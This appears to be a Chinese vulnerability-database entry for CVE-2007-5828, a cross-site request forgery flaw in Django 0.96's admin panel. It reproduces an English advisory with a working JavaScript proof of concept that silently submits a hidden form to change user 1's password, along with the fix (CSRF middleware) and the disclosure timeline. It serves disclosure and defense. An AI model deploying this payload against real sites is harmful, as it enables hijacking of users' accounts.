Django Project 管理面板跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1188571 漏洞类型 跨站请求伪造
发布时间 2007-11-05 更新时间 2007-11-06
CVE编号 CVE-2007-5828 CNNVD-ID CNNVD-200711-038
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://cxsecurity.com/issue/WLB-2007110012
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200711-038
|漏洞详情
Django0.96版本的管理面板中存在跨站请求伪造漏洞,远程攻击者借助对admin/auth/user/1/password/的一个请求更改任意用户的密码。注意:这个问题一直有被Debian认为有争议,因为产品文档包括一项CSRF的保护模块,该产品包括建议。
|漏洞EXP

Author: J. Carlos Nieto.
Date: Oct 21, 2007

There exists a security hole in the default django's admin panel.

Background
==========
Django is a high-level Python Web framework that encourages rapid
development and clean, pragmatic design.
Django has an automatic admin panel that allows a person with admin
privileges to modify the database tables, it allows to change any user
password too.
See more at http://www.djangoproject.com

Summary
=======
django has, by default, no CSRF protection, this may allow an attacker
to change any user password by tricking a victim with admin privileges
into a special forged web page (even in a a totally different server)
that sends a request to change the password of the user with id = n. The
victim does not know that the form was sent. If the victim has admin
privileges the exploit will succeed, otherwise nothing will happen.

Severity
========
Mild. This problem exists only with the default installation and can be
easily solved using a middleware found in here:
http://www.djangoproject.com/documentation/csrf/.

Proof of concept
================
<script type="text/javascript">
window.onload = function() {
    var url = "http://127.0.0.1:8000/admin/auth/user/1/password/";

var pass = "funky";

var param = {
        password1: pass,
        password2: pass
    };

var form = document.createElement('form');
    form.action = url;
    form.method = 'post';
    form.target = 'hidden';
    form.style.display = 'none';

for (var i in param) {
        try {
            // ie
            var input = document.createElement('<input name="'+i+'">');
        } catch(e) {
            // other browsers
            var input = document.createElement('input');
            input.name = i;
        }
        input.setAttribute('value',  param[i]);
        form.appendChild(input);
    }
    document.body.appendChild(form);

form.submit();
}
</script>

<iframe name="hidden" style="display: none"></iframe>

Solution
========
Use the django's CSRF protection in all your applications. Take a look
at http://www.djangoproject.com/documentation/csrf/.

Disclosure Timeline
===================
2007.10.18 - Vulnerability found
2007.10.18 - Vulnerability reported to vendor
2007.10.18 - Vendor response
2007.10.21 - Advisory release

License
=======

Copyright 2007 J. Carlos Nieto

The contents of this document are licensed under the Creative Commons -
Attribution / Share Alike license.
|参考资料

来源:BUGTRAQ
名称:20071029Django0.96(stable)AdminPanelCSRF
链接:http://www.securityfocus.com/archive/1/archive/1/482983/100/0/threaded
来源:SREASON
名称:3338
链接:http://securityreason.com/securityalert/3338
来源:OSVDB
名称:45285
链接:http://osvdb.org/45285